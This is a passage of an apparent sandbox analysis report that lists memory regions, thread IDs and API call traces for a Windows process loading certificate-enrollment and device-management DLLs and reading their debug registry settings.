"c:\\windows\\system32\\enterpriseresourcemanager.dll") Region: id = 2177 start_va = 0x7fffab850000 end_va = 0x7fffab8f6fff monitored = 0 entry_point = 0x7fffab855ca0 region_type = mapped_file name = "dmenrollengine.dll" filename = "\\Windows\\System32\\dmenrollengine.dll" (normalized: "c:\\windows\\system32\\dmenrollengine.dll") Region: id = 2178 start_va = 0x2a10000 end_va = 0x2a10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 2179 start_va = 0x3b00000 end_va = 0x3b31fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui") Region: id = 2180 start_va = 0x3470000 end_va = 0x3472fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003470000" filename = "" Region: id = 2181 start_va = 0x3b40000 end_va = 0x3b41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 2182 start_va = 0x3b50000 end_va = 0x3b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b50000" filename = "" Region: id = 2183 start_va = 0x7fffa4290000 end_va = 0x7fffa4459fff monitored = 0 entry_point = 0x7fffa43c8360 region_type = mapped_file name = "appraiser.dll" filename = "\\Windows\\System32\\appraiser.dll" (normalized: "c:\\windows\\system32\\appraiser.dll") Region: id = 2185 start_va = 0x7fffcae30000 end_va = 0x7fffcb296fff monitored = 0 entry_point = 0x7fffcae53230 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2186 start_va = 0x7fffbf570000 end_va = 0x7fffbf5b2fff monitored = 0 entry_point = 0x7fffbf571810 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2187 start_va = 0x7fffadb70000 end_va = 0x7fffade9afff monitored = 0 entry_point = 0x7fffadcb4ed0 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 2188 start_va = 0x3470000 end_va = 0x3471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003470000" filename = "" Region: id = 2189 start_va = 0x7fffc8bf0000 end_va = 0x7fffc8d0afff monitored = 0 entry_point = 0x7fffc8bfc250 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 2191 start_va = 0x7fffb57e0000 end_va = 0x7fffb57f7fff monitored = 0 entry_point = 0x7fffb57e1360 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2193 start_va = 0x3b50000 end_va = 0x3b50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 2195 start_va = 0x7fffc6760000 end_va = 0x7fffc688ffff monitored = 0 entry_point = 0x7fffc67fdcf0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 2196 start_va = 0x7fffc8d70000 end_va = 0x7fffc8d98fff monitored = 0 entry_point = 0x7fffc8d71bd0 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 2197 start_va = 0x7fffc8d40000 end_va = 0x7fffc8d64fff monitored = 0 entry_point = 0x7fffc8d43920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2200 start_va = 0x3b50000 end_va = 0x3b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b50000" filename = "" Region: id = 2237 start_va = 0x7fffb5880000 end_va = 0x7fffb5891fff monitored = 0 entry_point = 0x7fffb5889300 region_type = mapped_file name = "enrollmentapi.dll" filename = "\\Windows\\System32\\enrollmentapi.dll" (normalized: "c:\\windows\\system32\\enrollmentapi.dll") Region: id = 2238 start_va = 0x2a30000 end_va = 0x2a31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 2241 start_va = 0x7fffa81e0000 end_va = 0x7fffa8396fff monitored = 0 entry_point = 0x7fffa830d5c0 region_type = mapped_file name = "enterprisecsps.dll" filename = "\\Windows\\System32\\enterprisecsps.dll" (normalized: "c:\\windows\\system32\\enterprisecsps.dll") Region: id = 2242 start_va = 0x7fffabb50000 end_va = 0x7fffabba4fff monitored = 0 entry_point = 0x7fffabb79840 region_type = mapped_file name = "dmenterprisediagnostics.dll" filename = "\\Windows\\System32\\dmenterprisediagnostics.dll" (normalized: "c:\\windows\\system32\\dmenterprisediagnostics.dll") Region: id = 2244 start_va = 0x7fffabb10000 end_va = 0x7fffabb47fff monitored = 0 entry_point = 0x7fffabb30600 region_type = mapped_file name = "omadmapi.dll" filename = "\\Windows\\System32\\omadmapi.dll" (normalized: "c:\\windows\\system32\\omadmapi.dll") Region: id = 2245 start_va = 0x7fffc31e0000 end_va = 0x7fffc31fffff monitored = 0 entry_point = 0x7fffc31e1630 region_type = mapped_file name = "dmcfgutils.dll" filename = "\\Windows\\System32\\dmcfgutils.dll" (normalized: "c:\\windows\\system32\\dmcfgutils.dll") Region: id = 2246 start_va = 0x7fffc06e0000 end_va = 0x7fffc06fefff monitored = 0 entry_point = 0x7fffc06eeba0 region_type = mapped_file name = "dmxmlhelputils.dll" filename = "\\Windows\\System32\\dmxmlhelputils.dll" (normalized: "c:\\windows\\system32\\dmxmlhelputils.dll") Region: id = 2247 start_va = 0x7fffbda80000 end_va = 0x7fffbda8efff monitored = 0 entry_point = 0x7fffbda85010 region_type = mapped_file name = "iri.dll" filename = "\\Windows\\System32\\iri.dll" (normalized: "c:\\windows\\system32\\iri.dll") Region: id = 2248 start_va = 0x7f40000 end_va = 0x7fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f40000" filename = "" Region: id = 2249 start_va = 0x7fffa32a0000 end_va = 0x7fffa35cbfff monitored = 0 entry_point = 0x7fffa32a5160 region_type = mapped_file name = "certenroll.dll" filename = "\\Windows\\System32\\CertEnroll.dll" (normalized: "c:\\windows\\system32\\certenroll.dll") Region: id = 2250 start_va = 0x7fffa4080000 end_va = 0x7fffa414cfff monitored = 1 entry_point = 0x7fffa4082e40 region_type = mapped_file name = "certca.dll" filename = "\\Windows\\System32\\certca.dll" (normalized: "c:\\windows\\system32\\certca.dll") Region: id = 2251 start_va = 0x7fffbeb90000 end_va = 0x7fffbeb9bfff monitored = 0 entry_point = 0x7fffbeb91510 region_type = mapped_file name = "dsparse.dll" filename = "\\Windows\\System32\\dsparse.dll" (normalized: "c:\\windows\\system32\\dsparse.dll") Region: id = 2284 start_va = 0x8830000 end_va = 0x8925fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernel32.dll.mui" filename = "\\Windows\\System32\\en-US\\kernel32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernel32.dll.mui") Region: id = 2352 start_va = 0x2a30000 end_va = 0x2a31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 2353 start_va = 0x8f00000 end_va = 0x8ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f00000" filename = "" Region: id = 2357 start_va = 0x3470000 end_va = 0x3470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003470000" filename = "" Region: id = 2459 start_va = 0x3470000 end_va = 0x3471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003470000" filename = "" Region: id = 2661 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 2677 start_va = 0x2a30000 end_va = 0x2a35fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 2843 start_va = 0x1240000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 2844 start_va = 0x600000 end_va = 0x60cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2847 start_va = 0x600000 end_va = 0x601fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2848 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2849 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2939 start_va = 0x600000 end_va = 0x601fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2940 start_va = 0x610000 end_va = 0x61cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2942 start_va = 0x610000 end_va = 0x61cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2954 start_va = 0x610000 end_va = 0x618fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2956 start_va = 0x610000 end_va = 0x615fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2958 start_va = 0x620000 end_va = 0x625fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 2959 start_va = 0x630000 end_va = 0x638fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 2982 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 2983 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2984 start_va = 0x630000 end_va = 0x633fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 2985 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2986 start_va = 0x630000 end_va = 0x633fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 2987 start_va = 0x610000 end_va = 0x613fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2999 start_va = 0x1f00000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 3000 start_va = 0x2180000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 3215 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 3854 start_va = 0x600000 end_va = 0x60cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 3856 start_va = 0x600000 end_va = 0x601fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 3858 start_va = 0x1240000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 3860 start_va = 0x600000 end_va = 0x601fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 3861 start_va = 0x610000 end_va = 0x615fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3863 start_va = 0x620000 end_va = 0x625fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 3864 start_va = 0x630000 end_va = 0x638fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 3866 start_va = 0x630000 end_va = 0x634fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 4041 start_va = 0x610000 end_va = 0x611fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4042 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 4043 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 4044 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 4061 start_va = 0x630000 end_va = 0x63cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 4063 start_va = 0x630000 end_va = 0x631fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 4501 start_va = 0x7fffabd60000 end_va = 0x7fffabd82fff monitored = 0 entry_point = 0x7fffabd72c30 region_type = mapped_file name = "waasassessment.dll" filename = "\\Windows\\System32\\WaaSAssessment.dll" (normalized: "c:\\windows\\system32\\waasassessment.dll") Region: id = 4502 start_va = 0x7fffbe450000 end_va = 0x7fffbe534fff monitored = 0 entry_point = 0x7fffbe4dac50 region_type = mapped_file name = "flightsettings.dll" filename = "\\Windows\\System32\\FlightSettings.dll" (normalized: "c:\\windows\\system32\\flightsettings.dll") Region: id = 4505 start_va = 0x7fffc34f0000 end_va = 0x7fffc350efff monitored = 0 entry_point = 0x7fffc34fe410 region_type = mapped_file name = "utcutil.dll" filename = "\\Windows\\System32\\utcutil.dll" (normalized: "c:\\windows\\system32\\utcutil.dll") Region: id = 4506 start_va = 0x7fffbc5b0000 end_va = 0x7fffbc64bfff monitored = 0 entry_point = 0x7fffbc617870 region_type = mapped_file name = "dcntel.dll" filename = "\\Windows\\System32\\dcntel.dll" (normalized: "c:\\windows\\system32\\dcntel.dll") Region: id = 4507 start_va = 0x7fffab900000 end_va = 0x7fffab9aefff monitored = 0 entry_point = 0x7fffab919720 region_type = mapped_file name = "configmanager2.dll" filename = "\\Windows\\System32\\configmanager2.dll" (normalized: "c:\\windows\\system32\\configmanager2.dll") Region: id = 4508 start_va = 0x3460000 end_va = 0x34dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 4509 start_va = 0x7fffbe610000 end_va = 0x7fffbe642fff monitored = 0 entry_point = 0x7fffbe62cfd0 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 4510 start_va = 0x7fffb9e50000 end_va = 0x7fffb9e58fff monitored = 0 entry_point = 0x7fffb9e51380 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 4511 start_va = 0x7fffbc1a0000 end_va = 0x7fffbc1abfff monitored = 0 entry_point = 0x7fffbc1a31c0 region_type = mapped_file name = "dmoleaututils.dll" filename = "\\Windows\\System32\\dmoleaututils.dll" (normalized: "c:\\windows\\system32\\dmoleaututils.dll") Region: id = 4512 start_va = 0x7fffad1b0000 end_va = 0x7fffad1cffff monitored = 0 entry_point = 0x7fffad1c2180 region_type = mapped_file name = "enterpriseresourcemanager.dll" filename = "\\Windows\\System32\\enterpriseresourcemanager.dll" (normalized: "c:\\windows\\system32\\enterpriseresourcemanager.dll") Region: id = 4513 start_va = 0x7fffab850000 end_va = 0x7fffab8f6fff monitored = 0 entry_point = 0x7fffab855ca0 region_type = mapped_file name = "dmenrollengine.dll" filename = "\\Windows\\System32\\dmenrollengine.dll" (normalized: "c:\\windows\\system32\\dmenrollengine.dll") Region: id = 4514 start_va = 0x7fffad7a0000 end_va = 0x7fffad969fff monitored = 0 entry_point = 0x7fffad8d8360 region_type = mapped_file name = "appraiser.dll" filename = "\\Windows\\System32\\appraiser.dll" (normalized: "c:\\windows\\system32\\appraiser.dll") Region: id = 4515 start_va = 0x7fffcae30000 end_va = 0x7fffcb296fff monitored = 0 entry_point = 0x7fffcae53230 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 4516 start_va = 0x7fffbf570000 end_va = 0x7fffbf5b2fff monitored = 0 entry_point = 0x7fffbf571810 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 4517 start_va = 0x7fffadb70000 end_va = 0x7fffade9afff monitored = 0 entry_point = 0x7fffadcb4ed0 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 4518 start_va = 0x630000 end_va = 0x631fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 4519 start_va = 0x7fffc8bf0000 end_va = 0x7fffc8d0afff monitored = 0 entry_point = 0x7fffc8bfc250 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 4520 start_va = 0x7fffb57e0000 end_va = 0x7fffb57f7fff monitored = 0 entry_point = 0x7fffb57e1360 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4521 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 4522 start_va = 0x7fffc6760000 end_va = 0x7fffc688ffff monitored = 0 entry_point = 0x7fffc67fdcf0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 4523 start_va = 0x7fffc8d70000 end_va = 0x7fffc8d98fff monitored = 0 entry_point = 0x7fffc8d71bd0 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 4524 start_va = 0x7fffc8d40000 end_va = 0x7fffc8d64fff monitored = 0 entry_point = 0x7fffc8d43920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 4525 start_va = 0x7fffc34d0000 end_va = 0x7fffc34e1fff monitored = 0 entry_point = 0x7fffc34d9300 region_type = mapped_file name = "enrollmentapi.dll" filename = "\\Windows\\System32\\enrollmentapi.dll" (normalized: "c:\\windows\\system32\\enrollmentapi.dll") Region: id = 4526 start_va = 0x7fffa81e0000 end_va = 0x7fffa8396fff monitored = 0 entry_point = 0x7fffa830d5c0 region_type = mapped_file name = "enterprisecsps.dll" filename = "\\Windows\\System32\\enterprisecsps.dll" (normalized: "c:\\windows\\system32\\enterprisecsps.dll") Region: id = 4527 start_va = 0x7fffabb50000 end_va = 0x7fffabba4fff monitored = 0 entry_point = 0x7fffabb79840 region_type = mapped_file name = "dmenterprisediagnostics.dll" filename = "\\Windows\\System32\\dmenterprisediagnostics.dll" (normalized: "c:\\windows\\system32\\dmenterprisediagnostics.dll") Region: id = 4528 start_va = 0x7fffabb10000 end_va = 0x7fffabb47fff monitored = 0 entry_point = 0x7fffabb30600 region_type = mapped_file name = "omadmapi.dll" filename = "\\Windows\\System32\\omadmapi.dll" (normalized: "c:\\windows\\system32\\omadmapi.dll") Region: id = 4529 start_va = 0x7fffc31e0000 end_va = 0x7fffc31fffff monitored = 0 entry_point = 0x7fffc31e1630 region_type = mapped_file name = "dmcfgutils.dll" filename = "\\Windows\\System32\\dmcfgutils.dll" (normalized: "c:\\windows\\system32\\dmcfgutils.dll") Region: id = 4530 start_va = 0x7fffc06e0000 end_va = 0x7fffc06fefff monitored = 0 entry_point = 0x7fffc06eeba0 region_type = mapped_file name = "dmxmlhelputils.dll" filename = "\\Windows\\System32\\dmxmlhelputils.dll" (normalized: "c:\\windows\\system32\\dmxmlhelputils.dll") Region: id = 4531 start_va = 0x7fffa32a0000 end_va = 0x7fffa35cbfff monitored = 0 entry_point = 0x7fffa32a5160 region_type = mapped_file name = "certenroll.dll" filename = "\\Windows\\System32\\CertEnroll.dll" (normalized: "c:\\windows\\system32\\certenroll.dll") Region: id = 4532 start_va = 0x7fffbda80000 end_va = 0x7fffbda8efff monitored = 0 entry_point = 0x7fffbda85010 region_type = mapped_file name = "iri.dll" filename = "\\Windows\\System32\\iri.dll" (normalized: "c:\\windows\\system32\\iri.dll") Region: id = 4533 start_va = 0x7fffa4080000 end_va = 0x7fffa414cfff monitored = 1 entry_point = 0x7fffa4082e40 region_type = mapped_file name = "certca.dll" filename = "\\Windows\\System32\\certca.dll" (normalized: "c:\\windows\\system32\\certca.dll") Region: id = 4534 start_va = 0x7fffbeb90000 end_va = 0x7fffbeb9bfff monitored = 0 entry_point = 0x7fffbeb91510 region_type = mapped_file name = "dsparse.dll" filename = "\\Windows\\System32\\dsparse.dll" (normalized: "c:\\windows\\system32\\dsparse.dll") Region: id = 4535 start_va = 0x3a00000 end_va = 0x3a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 4625 start_va = 0x1240000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 4626 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 4627 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 4798 start_va = 0x610000 end_va = 0x611fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5139 start_va = 0x600000 end_va = 0x606fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Thread: id = 98 os_tid = 0xfe4 Thread: id = 99 os_tid = 0xe50 Thread: id = 100 os_tid = 0x1734 Thread: id = 101 os_tid = 0x1694 Thread: id = 102 os_tid = 0xfbc Thread: id = 103 os_tid = 0x1564 Thread: id = 104 os_tid = 0x1530 Thread: id = 105 os_tid = 0xb68 Thread: id = 106 os_tid = 0x86c Thread: id = 107 os_tid = 0x17d8 Thread: id = 108 os_tid = 0x161c Thread: id = 109 os_tid = 0x1510 Thread: id = 110 os_tid = 0x1754 Thread: id = 111 os_tid = 0x1794 Thread: id = 112 os_tid = 0x17a4 Thread: id = 113 os_tid = 0x13dc Thread: id = 114 os_tid = 0x1324 Thread: id = 115 os_tid = 0x118c Thread: id = 116 os_tid = 0xcf8 Thread: id = 117 os_tid = 0x1200 Thread: id = 118 os_tid = 0x1218 Thread: id = 119 os_tid = 0x1220 Thread: id = 120 os_tid = 0x119c Thread: id = 121 os_tid = 0x5b4 Thread: id = 122 os_tid = 0x160c Thread: id = 123 os_tid = 0x14cc Thread: id = 124 os_tid = 0x1118 Thread: id = 125 os_tid = 0x1010 Thread: id = 126 os_tid = 0x100c Thread: id = 127 os_tid = 0x560 Thread: id = 128 os_tid = 0xcdc Thread: id = 129 os_tid = 0x520 Thread: id = 130 os_tid = 0xde0 Thread: id = 131 os_tid = 0xc54 Thread: id = 132 os_tid = 0xb90 Thread: id = 133 os_tid = 0xa60 Thread: id = 134 os_tid = 0x64c Thread: id = 135 os_tid = 0x488 Thread: id = 136 os_tid = 0x48c Thread: id = 137 os_tid = 0xae4 Thread: id = 138 os_tid = 0x858 Thread: id = 139 os_tid = 0x830 Thread: id = 140 os_tid = 0x4a4 Thread: id = 141 os_tid = 0xb14 Thread: id = 142 os_tid = 0xdb4 Thread: id = 143 os_tid = 0xee0 Thread: id = 144 os_tid = 0xf74 Thread: id = 145 os_tid = 0xf5c Thread: id = 146 os_tid = 0xf50 Thread: id = 147 os_tid = 0xf48 Thread: id = 148 os_tid = 0xf4c Thread: id = 149 os_tid = 0x4e0 Thread: id = 150 os_tid = 0x640 Thread: id = 151 os_tid = 0x538 Thread: id = 152 os_tid = 0x810 Thread: id = 153 os_tid = 0x80c Thread: id = 154 os_tid = 0xe24 [0312.584] LocalFree (hMem=0x604fed0) returned 0x0 [0312.587] free (_Block=0x5557e0) [0369.303] malloc (_Size=0x100) returned 0x51a280 [0369.304] __dllonexit () returned 0x7fffa4084950 [0369.304] __dllonexit () returned 0x7fffa4084960 [0369.304] __dllonexit () returned 0x7fffa4084970 [0369.304] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".dll", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 1 [0369.304] LocalAlloc (uFlags=0x0, uBytes=0x16) returned 0x8bc9210 [0369.304] memcpy (in: _Dst=0x8bc9210, _Src=0x7fffa40dcf00, _Size=0x16 | out: _Dst=0x8bc9210) returned 0x8bc9210 [0369.304] LocalAlloc (uFlags=0x0, uBytes=0x1e) returned 0x8bc9510 [0369.304] LocalFree (hMem=0x8bc9210) returned 0x0 [0369.305] LocalFree (hMem=0x0) returned 0x0 [0369.305] LocalFree (hMem=0x0) returned 0x0 [0369.305] DisableThreadLibraryCalls (hLibModule=0x7fffa4080000) returned 1 [0369.306] getenv (_VarName="CERTSRV_DEBUG") returned 0x0 [0369.306] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", lpValue="Debug", dwFlags=0x10, pdwType=0x0, pvData=0x4efa53c, pcbData=0x4efa504*=0x4 | out: pdwType=0x0, pvData=0x4efa53c, pcbData=0x4efa504*=0x4) returned 0x2 [0369.307] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration", lpValue="Debug", dwFlags=0x10, pdwType=0x0, pvData=0x4efa538, pcbData=0x4efa504*=0x4 | out: pdwType=0x0, pvData=0x4efa538, pcbData=0x4efa504*=0x4) returned 0x2 [0369.307] LocalAlloc (uFlags=0x40, uBytes=0x70) returned 0x84c1a90 [0369.307] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration", ulOptions=0x0, samDesired=0x20019, phkResult=0x4efa550 | out: phkResult=0x4efa550*=0x0) returned 0x2 [0369.308] LocalFree (hMem=0x84c1a90) returned 0x0 [0369.308] GetLocalTime (in: lpSystemTime=0x4ef9838 | out: lpSystemTime=0x4ef9838*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x3a, wSecond=0x3, wMilliseconds=0x1f4)) [0369.308] _vsnprintf (in: _DstBuf=0x4ef9848, _MaxCount=0xf, _Format="File%u", _ArgList=0x4ef97c8 | out: _DstBuf="File437") returned 7 [0369.308] GetACP () returned 0x4e4 [0369.308] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="certenroll.log", cbMultiByte=-1, lpWideCharStr=0x4efa5f0, cchWideChar=64 | out: lpWideCharStr="certenroll.log") returned 15 [0369.308] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", lpValue="certenroll.log", dwFlags=0x10, pdwType=0x0, pvData=0x4efa518, pcbData=0x4efa504*=0x4 | out: pdwType=0x0, pvData=0x4efa518, pcbData=0x4efa504*=0x4) returned 0x2 Thread: id = 155 os_tid = 0x464 Thread: id = 156 os_tid = 0xbf4 Thread: id = 157 os_tid = 0x990 Thread: id = 158 os_tid = 0x870 Thread: id = 159 os_tid = 0x82c Thread: id = 160 os_tid = 0x814 Thread: id = 161 os_tid = 0x5c0 Thread: id = 162 os_tid = 0x518 Thread: id = 163 os_tid = 0x284 Thread: id = 164 os_tid = 0x4b4 Thread: id = 165 os_tid = 0x6dc Thread: id = 166 os_tid = 0x428 Thread: id = 167 os_tid = 0x7fc Thread: id = 168 os_tid = 0x778 [0226.459] malloc (_Size=0x100) returned 0x5557e0 [0226.459] __dllonexit () returned 0x7fffa4084950 [0226.459] __dllonexit () returned 0x7fffa4084960 [0226.459] __dllonexit () returned 0x7fffa4084970 [0226.459] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".dll", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 1 [0226.459] LocalAlloc (uFlags=0x0, uBytes=0x16) returned 0x604fe50 [0226.459] memcpy (in: _Dst=0x604fe50, _Src=0x7fffa40dcf00, _Size=0x16 | out: _Dst=0x604fe50) returned 0x604fe50 [0226.459] LocalAlloc (uFlags=0x0, uBytes=0x1e) returned 0x604fed0 [0226.459] LocalFree (hMem=0x604fe50) returned 0x0 [0226.460] LocalFree 